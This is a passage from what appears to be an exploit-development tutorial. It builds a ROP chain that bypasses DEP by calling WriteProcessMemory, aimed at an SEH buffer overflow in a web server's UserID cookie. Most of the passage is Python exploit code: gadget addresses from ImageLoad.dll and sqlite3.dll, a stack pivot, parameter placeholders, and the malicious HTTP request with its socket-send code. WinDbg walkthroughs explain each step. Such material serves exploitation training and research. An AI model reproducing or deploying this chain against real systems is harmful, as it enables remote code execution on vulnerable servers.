To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a β€œpreparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another β€œcommon” register, ECX. ECX is a register that is used as a β€œcounter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be β€œpopped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38). 
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a β€œNOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction - this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and β€œmind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness sake, until we hit the add esp, 0x24 gadget - we will refer to the β€œtarget” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially β€œmoving” the address into EBP.

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop ebx between the address before 0xCCCCCCCC

Program executing has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of β€œpadding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To β€œbypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these functions points to a Windows API function.

We have β€œthe base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these functions points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32WriteProcessMemory - it does contain pointers to other kernel32.dll pointers, such as kernel32!WriteFileImplementation. We also know that the distance between each function with a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next β€œparameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we β€œproxy” the write through the API call.

Viewing the .text section address - we can see that the address chosen is just an executable β€œcode cave” that is not initialized to any memory - meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a β€œpseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is β€œspecial” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the β€œreturn” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberofBytesWrittne will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the β€œpointer” method of ROP (when it comes to x86 at least), where we will place these parameter β€œplaceholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX vai "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

The above PoC places the parameters on the stack and also performs a β€œjump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now β€œbehind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way - we can β€œofficially” begin our ROP chain to obtain code execution.


The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we β€œdereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the β€œcarry” flag (the CF register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not consequently disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a β€œpreparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, there were no such gadgets that were found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10 instead of 0x18 - due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 = 0x8).

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to β€œsimulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as β€œROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will β€œaim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our β€œshellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002dc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get β€œjumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need compensate for two pop gadgets.

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode.

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!


nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would perform an add esp, X ; ret. Why add, esp X you may ask?

As you may, or may not, know - when a call instruction is executed - it pushes its return address onto the stack. This is done so the caller knows where to return after it is done executing. However, we can just execute an add esp X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack - meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the β€œreturn to the stack” ROP gadget into EDI.

pop edi places the instruction into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a β€œclean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can eventually use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended value of 0x180.

We used the ECX register, which currently still contains the address on the stack that holds the now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 12 (0xC) decimal bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
